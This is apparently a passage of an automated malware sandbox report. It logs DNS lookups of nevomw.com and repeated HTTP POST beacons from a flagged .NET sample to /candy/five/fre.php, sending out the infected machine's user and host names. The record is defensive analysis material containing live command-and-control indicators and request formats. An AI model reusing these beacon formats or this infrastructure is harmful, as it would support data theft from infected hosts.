                                            Dec 2, 2020 11:54:04.626287937 CET8.8.8.8192.168.2.60xd7c9No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:05.023329020 CET8.8.8.8192.168.2.60x70ffNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:05.023329020 CET8.8.8.8192.168.2.60x70ffNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:05.644040108 CET8.8.8.8192.168.2.60xc671No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:05.644040108 CET8.8.8.8192.168.2.60xc671No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:06.055572033 CET8.8.8.8192.168.2.60x5979No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:06.055572033 CET8.8.8.8192.168.2.60x5979No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:06.453480005 CET8.8.8.8192.168.2.60xc8aaNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:06.453480005 CET8.8.8.8192.168.2.60xc8aaNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:06.849554062 CET8.8.8.8192.168.2.60x2a0fNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:06.849554062 CET8.8.8.8192.168.2.60x2a0fNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:07.314105034 CET8.8.8.8192.168.2.60x3c98No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:07.314105034 CET8.8.8.8192.168.2.60x3c98No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:07.688730955 CET8.8.8.8192.168.2.60x5e6No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:07.688730955 CET8.8.8.8192.168.2.60x5e6No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:08.060218096 CET8.8.8.8192.168.2.60x1ca3No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:08.060218096 CET8.8.8.8192.168.2.60x1ca3No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:08.444842100 CET8.8.8.8192.168.2.60xc7adNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:08.444842100 CET8.8.8.8192.168.2.60xc7adNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:08.951280117 CET8.8.8.8192.168.2.60xc810No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:08.951280117 CET8.8.8.8192.168.2.60xc810No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:09.958149910 CET8.8.8.8192.168.2.60xd073No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:09.958149910 CET8.8.8.8192.168.2.60xd073No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:11.553925991 CET8.8.8.8192.168.2.60x49bfNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:11.553925991 CET8.8.8.8192.168.2.60x49bfNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:12.012125969 CET8.8.8.8192.168.2.60x7151No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:12.012125969 CET8.8.8.8192.168.2.60x7151No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:12.575284958 CET8.8.8.8192.168.2.60x788dNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:12.575284958 CET8.8.8.8192.168.2.60x788dNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:12.955569983 CET8.8.8.8192.168.2.60xc0fbNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:12.955569983 CET8.8.8.8192.168.2.60xc0fbNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:13.393708944 CET8.8.8.8192.168.2.60x2adaNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:13.393708944 CET8.8.8.8192.168.2.60x2adaNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:13.844626904 CET8.8.8.8192.168.2.60xa6cdNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:13.844626904 CET8.8.8.8192.168.2.60xa6cdNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:14.211426020 CET8.8.8.8192.168.2.60xf369No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:14.211426020 CET8.8.8.8192.168.2.60xf369No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:14.662740946 CET8.8.8.8192.168.2.60x1aa4No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:14.662740946 CET8.8.8.8192.168.2.60x1aa4No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:15.072242975 CET8.8.8.8192.168.2.60x2b15No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:15.072242975 CET8.8.8.8192.168.2.60x2b15No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:15.486371994 CET8.8.8.8192.168.2.60xf9e6No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:15.486371994 CET8.8.8.8192.168.2.60xf9e6No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:15.847944975 CET8.8.8.8192.168.2.60x67f5No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:15.847944975 CET8.8.8.8192.168.2.60x67f5No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:16.294827938 CET8.8.8.8192.168.2.60x7c0bNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:16.294827938 CET8.8.8.8192.168.2.60x7c0bNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:16.658166885 CET8.8.8.8192.168.2.60x8ff2No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:16.658166885 CET8.8.8.8192.168.2.60x8ff2No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:17.099864960 CET8.8.8.8192.168.2.60xc015No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:17.099864960 CET8.8.8.8192.168.2.60xc015No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:17.452892065 CET8.8.8.8192.168.2.60x9eb2No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:17.452892065 CET8.8.8.8192.168.2.60x9eb2No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:17.873565912 CET8.8.8.8192.168.2.60xd2f4No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:17.873565912 CET8.8.8.8192.168.2.60xd2f4No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:18.262433052 CET8.8.8.8192.168.2.60x6bdbNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:18.262433052 CET8.8.8.8192.168.2.60x6bdbNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:18.729583979 CET8.8.8.8192.168.2.60x2475No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:18.729583979 CET8.8.8.8192.168.2.60x2475No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:19.178170919 CET8.8.8.8192.168.2.60x9689No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:19.178170919 CET8.8.8.8192.168.2.60x9689No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:19.566035986 CET8.8.8.8192.168.2.60x5042No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:19.566035986 CET8.8.8.8192.168.2.60x5042No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:19.954097033 CET8.8.8.8192.168.2.60x8aa6No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:19.954097033 CET8.8.8.8192.168.2.60x8aa6No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:20.410152912 CET8.8.8.8192.168.2.60x3008No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:20.410152912 CET8.8.8.8192.168.2.60x3008No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:20.801265001 CET8.8.8.8192.168.2.60xd77No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:20.801265001 CET8.8.8.8192.168.2.60xd77No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:21.193521976 CET8.8.8.8192.168.2.60x3028No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:21.193521976 CET8.8.8.8192.168.2.60x3028No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:21.552454948 CET8.8.8.8192.168.2.60xd69eNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:21.552454948 CET8.8.8.8192.168.2.60xd69eNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:21.933320999 CET8.8.8.8192.168.2.60xbebaNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:21.933320999 CET8.8.8.8192.168.2.60xbebaNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:22.338968992 CET8.8.8.8192.168.2.60x25d0No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:22.338968992 CET8.8.8.8192.168.2.60x25d0No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:22.757113934 CET8.8.8.8192.168.2.60x5cf9No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:22.757113934 CET8.8.8.8192.168.2.60x5cf9No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:23.128216028 CET8.8.8.8192.168.2.60x7f4aNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:23.128216028 CET8.8.8.8192.168.2.60x7f4aNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:23.537627935 CET8.8.8.8192.168.2.60x9134No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:23.537627935 CET8.8.8.8192.168.2.60x9134No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:23.944153070 CET8.8.8.8192.168.2.60xacccNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:23.944153070 CET8.8.8.8192.168.2.60xacccNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:24.356986046 CET8.8.8.8192.168.2.60xf771No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:24.356986046 CET8.8.8.8192.168.2.60xf771No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:24.804790974 CET8.8.8.8192.168.2.60xa872No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:24.804790974 CET8.8.8.8192.168.2.60xa872No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:25.223370075 CET8.8.8.8192.168.2.60xb823No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:25.223370075 CET8.8.8.8192.168.2.60xb823No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:25.660767078 CET8.8.8.8192.168.2.60xa121No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:25.660767078 CET8.8.8.8192.168.2.60xa121No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:26.084630966 CET8.8.8.8192.168.2.60xb601No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:26.084630966 CET8.8.8.8192.168.2.60xb601No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:26.511482000 CET8.8.8.8192.168.2.60x76f6No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:26.511482000 CET8.8.8.8192.168.2.60x76f6No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:26.911792994 CET8.8.8.8192.168.2.60xa9acNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:26.911792994 CET8.8.8.8192.168.2.60xa9acNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:27.375550985 CET8.8.8.8192.168.2.60x59c9No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:27.375550985 CET8.8.8.8192.168.2.60x59c9No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:27.779042959 CET8.8.8.8192.168.2.60x9e66No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:27.779042959 CET8.8.8.8192.168.2.60x9e66No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:28.149195910 CET8.8.8.8192.168.2.60x6318No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:28.149195910 CET8.8.8.8192.168.2.60x6318No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:28.586132050 CET8.8.8.8192.168.2.60x7812No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:28.586132050 CET8.8.8.8192.168.2.60x7812No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:29.034487963 CET8.8.8.8192.168.2.60x7170No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:29.034487963 CET8.8.8.8192.168.2.60x7170No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:29.417880058 CET8.8.8.8192.168.2.60x7969No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:29.417880058 CET8.8.8.8192.168.2.60x7969No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:29.824332952 CET8.8.8.8192.168.2.60x5a3No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:29.824332952 CET8.8.8.8192.168.2.60x5a3No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:30.208987951 CET8.8.8.8192.168.2.60xf272No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:30.208987951 CET8.8.8.8192.168.2.60xf272No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:30.628851891 CET8.8.8.8192.168.2.60x90b1No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:30.628851891 CET8.8.8.8192.168.2.60x90b1No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:31.012420893 CET8.8.8.8192.168.2.60xaf48No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:31.012420893 CET8.8.8.8192.168.2.60xaf48No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:31.466401100 CET8.8.8.8192.168.2.60xa31bNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:31.466401100 CET8.8.8.8192.168.2.60xa31bNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:31.909837961 CET8.8.8.8192.168.2.60xc14fNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:31.909837961 CET8.8.8.8192.168.2.60xc14fNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:32.366041899 CET8.8.8.8192.168.2.60x2755No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:32.366041899 CET8.8.8.8192.168.2.60x2755No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:32.825603962 CET8.8.8.8192.168.2.60xc279No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:32.825603962 CET8.8.8.8192.168.2.60xc279No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:33.261178970 CET8.8.8.8192.168.2.60xc462No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:33.261178970 CET8.8.8.8192.168.2.60xc462No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:33.696609020 CET8.8.8.8192.168.2.60x438aNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:33.696609020 CET8.8.8.8192.168.2.60x438aNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • nevomw.com

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            0192.168.2.64971245.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:52:41.429219961 CET57OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 196
                                            Connection: close
                                            Dec 2, 2020 11:52:41.481232882 CET57OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: 'ckav.ruengineer367706DESKTOP-716T771k08F9C4E9C79A3B52B3F739430dit5F
                                            Dec 2, 2020 11:52:41.556689978 CET57INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:41 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 15
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            1192.168.2.64971345.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:52:41.861237049 CET58OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 196
                                            Connection: close
                                            Dec 2, 2020 11:52:41.914042950 CET59OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: 'ckav.ruengineer367706DESKTOP-716T771+08F9C4E9C79A3B52B3F739430mUF2c
                                            Dec 2, 2020 11:52:41.989274979 CET59INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:41 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 15
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            10192.168.2.64972345.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:52:47.200282097 CET85OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:47.253993034 CET85OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:47.331655025 CET85INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:47 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            100192.168.2.64984145.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:29.835345984 CET1397OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:29.887763023 CET1397OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:29.961003065 CET1399INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:29 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            101192.168.2.64984345.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:30.245196104 CET1401OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:30.297722101 CET1405OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:30.371175051 CET1406INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:30 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            102192.168.2.64984445.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:30.625790119 CET1413OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:30.678523064 CET1413OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:30.751743078 CET1413INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:30 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            103192.168.2.64984545.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:31.037564993 CET1414OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
